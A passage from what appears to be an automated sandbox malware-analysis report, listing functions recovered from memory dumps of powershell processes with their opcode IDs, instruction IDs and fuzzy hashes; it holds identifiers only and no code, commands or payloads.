                                                                    • Instruction Fuzzy Hash: AED0A73100D3848FC306DB30EC909A03B28DBC231034100EAE4868B1B3C765A588CB51
                                                                    Function 041BF870 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction ID: f8f89a53ae64a2f14c50b81f932527954b68098295f45ad48f9afeee91da314d
                                                                    • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                    • Instruction Fuzzy Hash: 61D06270D042099F8784EFADC94156DFBF4EB48200F5085AAC959E7301F7315612DBD1
                                                                    Function 041B8748 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 25659bd3d54c060755c54cb4730e34fb0f434a3f9b213dfb05978dda73256e5e
                                                                    • Instruction ID: 30d0fec480346ef85e2e9cd65544858d7c1c65effa199bdc0d3d6ca00b37a193
                                                                    • Opcode Fuzzy Hash: 25659bd3d54c060755c54cb4730e34fb0f434a3f9b213dfb05978dda73256e5e
                                                                    • Instruction Fuzzy Hash: 63D017308141098BCB18BBA4E85B5BDBB34FA00311F4101A9D90752190EB362A4BCAC0
                                                                    Function 041B7E90 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fbbdecb4ab4e41d2baa79321ac15cc95dfcf862d6d9a4644e8e9d5a2341e7a3a
                                                                    • Instruction ID: 81bcae1ed1a2613782d28405631b7d4b5e20c8a5195e3562058c1c8a83bb8d4d
                                                                    • Opcode Fuzzy Hash: fbbdecb4ab4e41d2baa79321ac15cc95dfcf862d6d9a4644e8e9d5a2341e7a3a
                                                                    • Instruction Fuzzy Hash: F0C08C3A80C3A14FEE03C2312CA21A13FB0849332030602D3E886C7023C918C94AC2A2
                                                                    Function 041B8810 Relevance: .0, Instructions: 15COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3030b1326c22633e09570af537c0fbced57699b49d4ce45c8509f4a0b9b53107
                                                                    • Instruction ID: fc5213baef585ab06b9a84e8962f6a22ea6e144c3d292a57407aec36ad31b4ff
                                                                    • Opcode Fuzzy Hash: 3030b1326c22633e09570af537c0fbced57699b49d4ce45c8509f4a0b9b53107
                                                                    • Instruction Fuzzy Hash: 5AD01234A1420ADBCB18EF64E44696DBBB4BB44300F004159D94593384EA306C01CBC1
                                                                    Function 041BEA57 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21073c8a82122c0a7a42ae29b5823463a057d33c8219de685e638cafa70cdcde
                                                                    • Instruction ID: eb2f40b4d1045edbf103f06c7f8184a6d0c3a9bd53690ecadf57006f35dd999e
                                                                    • Opcode Fuzzy Hash: 21073c8a82122c0a7a42ae29b5823463a057d33c8219de685e638cafa70cdcde
                                                                    • Instruction Fuzzy Hash: 8CD09239B44218CFDB18CB98E896ADCF371FF84325F1180A5E51A97250DB32AD12CB80
                                                                    Function 041BDC9B Relevance: .0, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9fb0b41803e6f7fe0b3f7ed560bb8389d5a1113f33edade583be0a6b34f60fe2
                                                                    • Instruction ID: e41eb2fe35f221f9d06c32c98d6bebeb303a4f258b9b230a74d93bcffaa683ee
                                                                    • Opcode Fuzzy Hash: 9fb0b41803e6f7fe0b3f7ed560bb8389d5a1113f33edade583be0a6b34f60fe2
                                                                    • Instruction Fuzzy Hash: 64B0922B714084C1090C8086B8C10ECA720D0D8272B420063CACA81004E360222595D2
                                                                    Function 041B7928 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd28b686c2beb1fcea7dffe84289110a7f0fe5f9539771b31daaf35db2e28fab
                                                                    • Instruction ID: e7d7314e69ea9e6b8418c725bcdb86139a55b1c4a3ef252219549bccd9e8b886
                                                                    • Opcode Fuzzy Hash: cd28b686c2beb1fcea7dffe84289110a7f0fe5f9539771b31daaf35db2e28fab
                                                                    • Instruction Fuzzy Hash: 3EB0923018A74C8FC2586F75AC44814732DAB4121578004A8E80E0A2A28E7AE884CE44
                                                                    Function 041BBD5F Relevance: .0, Instructions: 7COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2251865168.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_41b0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6334b0252ba55a88cf88512f3bbe4b152a7c0fde6ed2c9f9c16030233d81c729
                                                                    • Instruction ID: d04d0b6fb736bef9f0902f1fcc4724c1b54d5942944fa0f365a47db00d05af1f
                                                                    • Opcode Fuzzy Hash: 6334b0252ba55a88cf88512f3bbe4b152a7c0fde6ed2c9f9c16030233d81c729
                                                                    • Instruction Fuzzy Hash: 64A0223C32A3008AEB080E330A083FB3BEABEC02C3B08C0B2F000C0880CE3CC0022220

                                                                    Executed Functions

                                                                    Function 0471B470 Relevance: .3, Instructions: 263COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 35991e946de6081ae3ed187a42887bf0c608a7043613bb0d86ce9dbc1e8a7977
                                                                    • Instruction ID: 6c4a6abbc030bda0b787e1bcfa17bdaec6d4f4d6d837b490309cca10f17ead10
                                                                    • Opcode Fuzzy Hash: 35991e946de6081ae3ed187a42887bf0c608a7043613bb0d86ce9dbc1e8a7977
                                                                    • Instruction Fuzzy Hash: EB917A70E016969BEB19EFB488105AEBBF2EFC4610B40892DD506AB350DF74AA05CBD5
                                                                    Function 0471B490 Relevance: .3, Instructions: 252COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c0b392d92825317f0e9484851310d80956f1d717a769395558fe7e7e5c60ee5a
                                                                    • Instruction ID: a0bbf144d67c2961acfbe6547473c8f586ba6819463e7a0e109f35610d835dad
                                                                    • Opcode Fuzzy Hash: c0b392d92825317f0e9484851310d80956f1d717a769395558fe7e7e5c60ee5a
                                                                    • Instruction Fuzzy Hash: B4918C70F016969BEB19EFB488005AEBBF3EFC4610B40892DD506AB350DF74AE058BD5
                                                                    Function 072F2308 Relevance: 8.2, Strings: 6, Instructions: 654COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2323555217.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_72f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk$piRk$piRk$piRk$piRk$|,Tk
                                                                    • API String ID: 0-884015819
                                                                    • Opcode ID: f9db2434c287d197f25441d688920bdc4b791e703a7f552c4130c60415d7151c
                                                                    • Instruction ID: 9fd53b13c1cc57a03411680d2529703c51c36bd6bd15772c5860a1fbb34dcb11
                                                                    • Opcode Fuzzy Hash: f9db2434c287d197f25441d688920bdc4b791e703a7f552c4130c60415d7151c
                                                                    • Instruction Fuzzy Hash: 0C2246B1B20207DFDB258FA884056AEFBE5BFC6210F1484BAD605DB251DB71CD45CBA2
                                                                    Function 0471E5B9 Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk
                                                                    • API String ID: 0-1603274793
                                                                    • Opcode ID: 33395f628004e1869059f049c0727766b08617e05dd871dfcbece2ee8ff3fc4d
                                                                    • Instruction ID: 68e885f7c5d4244f74391eddf1de86df753b47962fe281014c1d3d7029fdded9
                                                                    • Opcode Fuzzy Hash: 33395f628004e1869059f049c0727766b08617e05dd871dfcbece2ee8ff3fc4d
                                                                    • Instruction Fuzzy Hash: 75414A30A002099FDB15DFB8D454A9EBBF1FF89704F1085A9D416AB3A1DB346D09CF90
                                                                    Function 0471E640 Relevance: 1.3, Strings: 1, Instructions: 83COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk
                                                                    • API String ID: 0-1603274793
                                                                    • Opcode ID: 53e311839c4efe7e6d5c7ecc45a6b646c2765a2fc889218e1534b8b2b6ff942c
                                                                    • Instruction ID: f79500e5a371cac5c0f54aaa2251898d027a194801e539e050bb391c92c2caf9
                                                                    • Opcode Fuzzy Hash: 53e311839c4efe7e6d5c7ecc45a6b646c2765a2fc889218e1534b8b2b6ff942c
                                                                    • Instruction Fuzzy Hash: 25313630A0120ADFDB14DF69D594A9EBBF2FF88304F108528D816A7390DB34AD49CF90
                                                                    Function 072F3CE8 Relevance: .6, Instructions: 602COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2323555217.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_72f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 009ff6ad131f85281f5d25bddff71991ea0446f130c89a08c5c31f5bed276152
                                                                    • Instruction ID: c787990d1ad0c0b5032ad2632ae348e15e90e3bed55db3c0150a6f1c228eca8b
                                                                    • Opcode Fuzzy Hash: 009ff6ad131f85281f5d25bddff71991ea0446f130c89a08c5c31f5bed276152
                                                                    • Instruction Fuzzy Hash: F0126BB1724286CFDB259BB888007ABFBA29FC1614F14847BDA05DF352DB71D846C7A1
                                                                    Function 047129F0 Relevance: .2, Instructions: 209COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 03f457cd0384301a605bfb54de38f61092d59759b05ec9f7e75792d92cce7c1c
                                                                    • Instruction ID: dc5a211a62a2bedcc8ab027b7ea2c5839dc14861422c81d9174d0a3391e3a255
                                                                    • Opcode Fuzzy Hash: 03f457cd0384301a605bfb54de38f61092d59759b05ec9f7e75792d92cce7c1c
                                                                    • Instruction Fuzzy Hash: 39915974A00245CFCB15CF5DC494AAEBBB1FF88310B2486AAD955AB366C735FC51CBA0
                                                                    Function 04717740 Relevance: .2, Instructions: 156COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6596aa1d824973889bfc140ef141c60869b8082d0d515bd12e5ad84d9fc8db7a
                                                                    • Instruction ID: 46cc5d3734b6af9ca8457a89b1b98fd65424531151ebfa41e10c319974b0be35
                                                                    • Opcode Fuzzy Hash: 6596aa1d824973889bfc140ef141c60869b8082d0d515bd12e5ad84d9fc8db7a
                                                                    • Instruction Fuzzy Hash: 8751B3343042059FD709DB79D844A6A7BEAFFC9265F14447AE509DB362EB31EC01CBA0
                                                                    Function 0471BAC0 Relevance: .2, Instructions: 155COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9a953d082dceb7097009b4aba0e48267298884d333cedb61f4a02f6969f2fc4d
                                                                    • Instruction ID: 8c169f83f5be8ca6ad59c229fc25c5c4bd5a04674cbc29828192342f82da5384
                                                                    • Opcode Fuzzy Hash: 9a953d082dceb7097009b4aba0e48267298884d333cedb61f4a02f6969f2fc4d
                                                                    • Instruction Fuzzy Hash: 77611775E00248DFDB14CFA9D584A9DBBF1FF88310F14812AE819AB365EB74AC85CB50
                                                                    Function 0471BAB0 Relevance: .2, Instructions: 151COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c05eacacb4c9f1c329eda65e7136501982deda13ad84d971d90944d314d1e31
                                                                    • Instruction ID: 8599bb3701454df145d0d6c33a3bd779659a1877cc39f9a6caa2e9426c77b463
                                                                    • Opcode Fuzzy Hash: 1c05eacacb4c9f1c329eda65e7136501982deda13ad84d971d90944d314d1e31
                                                                    • Instruction Fuzzy Hash: 5B512475E00248DFDB14CFA9D584A9DBFF1FF88310F18816AE819AB365EB74A845CB50
                                                                    Function 0471E419 Relevance: .1, Instructions: 140COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 49583492cac0df2fe3b4752ae5898ca9cc12ca02c29adee916b20c9f30a6294a
                                                                    • Instruction ID: d2db766d05cfd65622f8dab60ebcc69a8e34afc7ec71c640d8cc6aedb1ad1390
                                                                    • Opcode Fuzzy Hash: 49583492cac0df2fe3b4752ae5898ca9cc12ca02c29adee916b20c9f30a6294a
                                                                    • Instruction Fuzzy Hash: F0514534700205CFCB14DF6CC5949AABBE2EFC9314B5485ADE90A9B362EB74EC018B91
                                                                    Function 0471E428 Relevance: .1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 11de51a254b8c02cc612b4832e007b775155eea3f39fe81384d4c9992f66e2c4
                                                                    • Instruction ID: 886c528e57e9b09881f1e9fa0c1b546f839451fcdc96a9a646bac889cdcfc330
                                                                    • Opcode Fuzzy Hash: 11de51a254b8c02cc612b4832e007b775155eea3f39fe81384d4c9992f66e2c4
                                                                    • Instruction Fuzzy Hash: 54413834700205CFDB14DF6CC5949AABBE6EFC8314B54846DEA09DB365EB74EC018BA1
                                                                    Function 072F3CCD Relevance: .1, Instructions: 125COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2323555217.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_72f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec839e5458c69db7504592399ec1e1345878cef08086f5dd6c5e9c993cf2f6ef
                                                                    • Instruction ID: a4dfead4166a78898a550493999f7f6a64dacff40d29a9e3ab0416bdae83cb63
                                                                    • Opcode Fuzzy Hash: ec839e5458c69db7504592399ec1e1345878cef08086f5dd6c5e9c993cf2f6ef
                                                                    • Instruction Fuzzy Hash: F741C4F1A20243DFCB25CAA8C6407A6FBA29FC5650B1485BADA049F357C735DC46C7A1
                                                                    Function 04716FE0 Relevance: .1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5a99cc8c1917c17117e3efe0bd8c44d5ba524c0e38da3b44e53d50cd5a3bdc0b
                                                                    • Instruction ID: 108acf0cee28e97ba22ba47f5e36a9c87508dc01c7283c99a678bc0914deacf5
                                                                    • Opcode Fuzzy Hash: 5a99cc8c1917c17117e3efe0bd8c44d5ba524c0e38da3b44e53d50cd5a3bdc0b
                                                                    • Instruction Fuzzy Hash: DF415D34B042048FDB18DFA8C458AAEBBF1EF8D711F1444A9E406AB3A1DB35ED01CB61
                                                                    Function 04712B00 Relevance: .1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 654e449314db78845d168046e537e8f93fb9d38f329862f031970735cd7fa62b
                                                                    • Instruction ID: 392e815cc8232d4b24a3f1f0d5e3597c5775d85a6f7aaf3f671e8da93b71beef
                                                                    • Opcode Fuzzy Hash: 654e449314db78845d168046e537e8f93fb9d38f329862f031970735cd7fa62b
                                                                    • Instruction Fuzzy Hash: 17412674A00605DFCB15CF59C5989AEFBB1FF48310B1186A9D915AB365C732FC91CBA0
                                                                    Function 0471C388 Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3214fbb5ad2b1ed4f8510913e5717676d501618e297174981e9cb5b186cf7b2a
                                                                    • Instruction ID: 9b962a8eea337fd96ed99550d03186a61bf81e9dc3448395763fb71d039d05ca
                                                                    • Opcode Fuzzy Hash: 3214fbb5ad2b1ed4f8510913e5717676d501618e297174981e9cb5b186cf7b2a
                                                                    • Instruction Fuzzy Hash: 6F31A2353006019FE709DB78E844B9ABB92EFC4325F04853DD60ACB3A1DFB5A845CB91
                                                                    Function 04716FD1 Relevance: .1, Instructions: 98COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cd49f4f1d24e8a70dc026afce5a973f8620e31ef256a5cd18a8924f925632a3e
                                                                    • Instruction ID: 93527d0d25a407bdc9a0fe45eb666ca92c187fb1cf2c2c3afdac0a765a90cf8f
                                                                    • Opcode Fuzzy Hash: cd49f4f1d24e8a70dc026afce5a973f8620e31ef256a5cd18a8924f925632a3e
                                                                    • Instruction Fuzzy Hash: 2E312D34A002058FCB18CFA9C598AAEBBF1EF8D711F144499D446AB361DB31EC41CB61
                                                                    Function 0471AE60 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 58ca9d00df94696ae870419638b52b3ed58ac99c165669749574a955471bfa64
                                                                    • Instruction ID: 594c7ae0ce4ff986dadc83ededf3bc1765aa00d7f322e4f70ab5231a957b518b
                                                                    • Opcode Fuzzy Hash: 58ca9d00df94696ae870419638b52b3ed58ac99c165669749574a955471bfa64
                                                                    • Instruction Fuzzy Hash: DB316A70E012099FDB09DFBDD494AAE7BF6EF89314F148069E405EB361EB74AC418B51
                                                                    Function 0471AD28 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 408a7c314411a0066889e0901c224e1d06957181e042bf40696d238a96d59bda
                                                                    • Instruction ID: 232cf0107765653b0763b52f28dd588693ed49a517ebf24512d1fae55b3a6f98
                                                                    • Opcode Fuzzy Hash: 408a7c314411a0066889e0901c224e1d06957181e042bf40696d238a96d59bda
                                                                    • Instruction Fuzzy Hash: BF31C1B4E002459FEB05EBA4D858AAE7BB2EFC5304F1084B9C505AB3A5CB74AD01CF51
                                                                    Function 0471AE70 Relevance: .1, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8a357806b70f7b8926a1a671e7bfc0af21755b464fbca7ec01ed28a9f9d01a43
                                                                    • Instruction ID: ae63266fa4149ee25131140824b90a553f0d045ea819b5201ed610ce3575788d
                                                                    • Opcode Fuzzy Hash: 8a357806b70f7b8926a1a671e7bfc0af21755b464fbca7ec01ed28a9f9d01a43
                                                                    • Instruction Fuzzy Hash: E6314B74E012099FDB05DFBDD4947AEBBF6AF88314F148029E405EB360EB74AC418B61
                                                                    Function 0471DFC1 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9ee3a9e33cbaeae2ebfd9ea88856f9f130670ada107cd87b377a2c5842397580
                                                                    • Instruction ID: 73ad3f74cc11c2a8399f4bf7df6ef0eee8078272fa5a353047ebe01680fdae17
                                                                    • Opcode Fuzzy Hash: 9ee3a9e33cbaeae2ebfd9ea88856f9f130670ada107cd87b377a2c5842397580
                                                                    • Instruction Fuzzy Hash: 22313A70A002059FCB14DF68D458A9DBBF2FF89724F14456DD806AB3A1DB75AC85CB90
                                                                    Function 0471AF98 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4028de23085c5a7095effe28d3e4c5a870325c729529fdcdfd235bd678901b7
                                                                    • Instruction ID: dddd098451bde141784a53c354395edc5e3ec35a035b32b6a121f8997ca1ab03
                                                                    • Opcode Fuzzy Hash: c4028de23085c5a7095effe28d3e4c5a870325c729529fdcdfd235bd678901b7
                                                                    • Instruction Fuzzy Hash: C121AC71A043488FCB14DFAED440B9EBBF5EF89320F14846AD519E7350CB75A905CBA5
                                                                    Function 0471AD38 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2295942400.0000000004710000.00000040.00000800.00020000.00000000.sdmp, Offset: 04710000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_4710000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cc21fd29eb6fa18dad15375285b86861800a2090451f3674321e366398f3f5dc
                                                                    • Instruction ID: 0d38864930a7a1e581c950da6651522f95f5ad0a98d9e34db0504ef177c57304
                                                                    • Opcode Fuzzy Hash: cc21fd29eb6fa18dad15375285b86861800a2090451f3674321e366398f3f5dc
                                                                    • Instruction Fuzzy Hash: 5A3141B4E002099FEB44EBA4D858AAE7BB3EFC4304F108479D515AB394DB75AD01DF90
                                                                    Function 0471DFD0 Relevance: .1, Instructions: 77COMMON
                                                                    Download Yara Rule
